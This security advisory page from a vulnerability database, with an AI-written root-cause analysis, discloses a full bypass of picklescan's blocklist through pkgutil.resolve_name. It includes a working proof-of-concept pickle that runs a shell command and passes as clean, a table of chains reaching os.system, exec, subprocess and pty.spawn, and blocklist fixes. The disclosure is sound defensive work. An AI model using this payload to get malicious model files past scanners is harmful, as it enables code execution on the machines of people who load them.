10

CVSS Score

3.1

-

CVSS Score

Basic Information

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

GHSA-vvpj-8cmc-gx39

GHSA-vvpj-8cmc-gx39: PickleScan's pkgutil.resolve_name has a universal blocklist bypass

Summary

pkgutil.resolve_name() is a Python stdlib function that resolves any "module:attribute" string to the corresponding Python object at runtime. By using pkgutil.resolve_name as the first REDUCE call in a pickle, an attacker can obtain a reference to ANY blocked function (e.g., os.system, builtins.exec, subprocess.call) without that function appearing in the pickle's opcodes. picklescan only sees pkgutil.resolve_name (which is not blocked) and misses the actual dangerous function entirely.

This defeats picklescan's entire blocklist concept — every single entry in _unsafe_globals can be bypassed.

Severity

Critical (CVSS 10.0) — Universal bypass of all blocklist entries. Any blocked function can be invoked.

Affected Versions

picklescan <= 1.0.3 (all versions including latest)

Details

How It Works

A pickle file uses two chained REDUCE calls:

1. STACK_GLOBAL: push pkgutil.resolve_name
2. REDUCE: call resolve_name("os:system") → returns os.system function object
3. REDUCE: call the returned function("malicious command") → RCE

picklescan's opcode scanner sees:

STACK_GLOBAL with module=pkgutil, name=resolve_name → NOT in blocklist → CLEAN
The second REDUCE operates on a stack value (the return of the first call), not on a global import → invisible to scanner

The string "os:system" is just data (a SHORT_BINUNICODE argument to the first REDUCE) — picklescan does not analyze REDUCE arguments, only GLOBAL/INST/STACK_GLOBAL references.

Decompiled Pickle (what the data actually does)

from pkgutil import resolve_name
_var0 = resolve_name('os:system')          # Returns the actual os.system function
_var1 = _var0('malicious_command')          # Calls os.system('malicious_command')
result = _var1

Confirmed Bypass Targets

Every entry in picklescan's blocklist can be reached via resolve_name:

| Chain | Resolves To | Confirmed RCE | picklescan Result | |-------|------------|---------------|-------------------| | resolve_name("os:system") | os.system | YES | CLEAN | | resolve_name("builtins:exec") | builtins.exec | YES | CLEAN | | resolve_name("builtins:eval") | builtins.eval | YES | CLEAN | | resolve_name("subprocess:getoutput") | subprocess.getoutput | YES | CLEAN | | resolve_name("subprocess:getstatusoutput") | subprocess.getstatusoutput | YES | CLEAN | | resolve_name("subprocess:call") | subprocess.call | YES (shell=True needed) | CLEAN | | resolve_name("subprocess:check_call") | subprocess.check_call | YES (shell=True needed) | CLEAN | | resolve_name("subprocess:check_output") | subprocess.check_output | YES (shell=True needed) | CLEAN | | resolve_name("posix:system") | posix.system | YES | CLEAN | | resolve_name("cProfile:run") | cProfile.run | YES | CLEAN | | resolve_name("profile:run") | profile.run | YES | CLEAN | | resolve_name("pty:spawn") | pty.spawn | YES | CLEAN |

Total: 11+ confirmed RCE chains, all reporting CLEAN.

Proof of Concept

import struct, io, pickle

def sbu(s):
    b = s.encode()
    return b"\x8c" + struct.pack("<B", len(b)) + b

# resolve_name("os:system")("id")
payload = (
    b"\x80\x04\x95" + struct.pack("<Q", 55)
    + sbu("pkgutil") + sbu("resolve_name") + b"\x93"  # STACK_GLOBAL
    + sbu("os:system") + b"\x85" + b"R"                # REDUCE: resolve_name("os:system")
    + sbu("id") + b"\x85" + b"R"                       # REDUCE: os.system("id")
    + b"."                                               # STOP
)

# picklescan: 0 issues
from picklescan.scanner import scan_pickle_bytes
result = scan_pickle_bytes(io.BytesIO(payload), "test.pkl")
assert result.issues_count == 0  # CLEAN!

# Execute: runs os.system("id") → RCE
pickle.loads(payload)

Why `pkgutil` Is Not Blocked

picklescan's _unsafe_globals (v1.0.3) does not include pkgutil. The module is a standard import utility — its primary purpose is module/package resolution. However, resolve_name() can resolve ANY attribute from ANY module, making it a universal gadget.

Note: fickling DOES block pkgutil in its UNSAFE_IMPORTS list.

Impact

This is a complete bypass of picklescan's security model. The entire blocklist — every module and function entry in _unsafe_globals — is rendered ineffective. An attacker needs only use pkgutil.resolve_name as an indirection layer to call any Python function.

This affects:

HuggingFace Hub (uses picklescan)
Any ML pipeline using picklescan for safety validation
Any system relying on picklescan's blocklist to prevent malicious pickle execution

Suggested Fix

Immediate: Add pkgutil to _unsafe_globals:
```
"pkgutil": {"resolve_name"},
```

Also block similar resolution functions:

"importlib": "*",
"importlib.util": "*",

Architectural: The blocklist approach cannot defend against indirect resolution gadgets. Even blocking pkgutil, an attacker could find other stdlib functions that resolve module attributes. Consider:
- Analyzing REDUCE arguments for suspicious strings (e.g., patterns matching "module:function")
- Treating unknown globals as dangerous by default
- Switching to an allowlist model

(GitHub Advisory)

Miggo Vulnerability Database

→

GHSA-vvpj-8cmc-gx39

GHSA-vvpj-8cmc-gx39:

10

CVSS Score

3.1

-

CVSS Score

Basic Information

Is this CVE running in your environment?

Easily map the attack path and prioritize which CVEs are a threat to your organization

Validate Exposure

Technical Details

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
picklescan	pip	< 1.0.4	1.0.4

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability, identified as GHSA-vvpj-8cmc-gx39, represents a complete bypass of the picklescan library's security model. The root cause is the failure to include the Python standard library function pkgutil.resolve_name in its internal blocklist of dangerous functions (_unsafe_globals).

My analysis of the patch commit bf26452ae2e3204429762c2bb1aa9eacd40436bb, which upgrades picklescan to version 1.0.4, confirms this. The patch explicitly adds "pkgutil": {"resolve_name"} to the _unsafe_globals dictionary within src/picklescan/scanner.py.

The vulnerability is not a flaw within a specific function's implementation (like a buffer overflow), but rather a critical omission in the security data used by the scanner functions. The primary functions responsible for scanning, scan_pickle_bytes and scan_pickle_file, would consume this incomplete blocklist. As a result, when scanning a pickle crafted by an attacker, these functions would not recognize the use of pkgutil.resolve_name as a threat. The attacker's pickle could then use resolve_name('os:system') to dynamically load the os.system function and execute arbitrary commands, while picklescan would report the file as safe. Therefore, the scanning functions are identified as the vulnerable components because they provide a false sense of security.

Vulnerable functions

scan_pickle_bytes

src/picklescan/scanner.py

The function `scan_pickle_bytes` uses the `_unsafe_globals` dictionary as a blocklist to detect dangerous operations within a pickle file. In the vulnerable versions, this blocklist did not include `pkgutil.resolve_name`. An attacker could craft a malicious pickle that uses `pkgutil.resolve_name` to dynamically obtain a reference to any blocked function (like `os.system`) and execute it. Because `pkgutil.resolve_name` itself was not on the blocklist, `scan_pickle_bytes` would fail to detect the threat and incorrectly report the malicious pickle as safe, leading to a complete bypass of the scanner's security mechanism.

scan_pickle_file

src/picklescan/scanner.py

Similar to `scan_pickle_bytes`, the `scan_pickle_file` function relies on the `_unsafe_globals` blocklist for security scanning. It was vulnerable for the same reason: the blocklist's failure to include `pkgutil.resolve_name`. This allowed malicious pickle files to be scanned and passed as safe, while they contained a payload to execute arbitrary code via `pkgutil.resolve_name`.

Vulnerability Intelligence
Miggo AI

Unlock WAF rules for this CVE

Generate vendor-ready rules for the observed attack patterns, plus reasoning and safe deployment guidance

Get WAF rules

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

10

-

Basic Information

Basic Information

Concerned about an active attack path?

GHSA-vvpj-8cmc-gx39: PickleScan's pkgutil.resolve_name has a universal blocklist bypass

Summary

Severity

Affected Versions

Details

How It Works

Decompiled Pickle (what the data actually does)

Confirmed Bypass Targets

Proof of Concept

Why pkgutil Is Not Blocked

Impact

Suggested Fix

GHSA-vvpj-8cmc-gx39:

10

-

Basic Information

Basic Information

Is this CVE running in your environment?

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

Vulnerability IntelligenceMiggo AI

Unlock WAF rules for this CVE

WAF Protection Rules

WAF Rule

Reasoning

Technical Details

GHSA-vvpj-8cmc-gx39: PickleScan's pkgutil.resolve_name has a universal blocklist bypass

Summary

Severity

Affected Versions

Details

How It Works

Decompiled Pickle (what the data actually does)

Confirmed Bypass Targets

Proof of Concept

Why pkgutil Is Not Blocked

Impact

Suggested Fix

Basic Information

Basic Information

10

10

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

Why `pkgutil` Is Not Blocked

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Why `pkgutil` Is Not Blocked

Vulnerability Intelligence
Miggo AI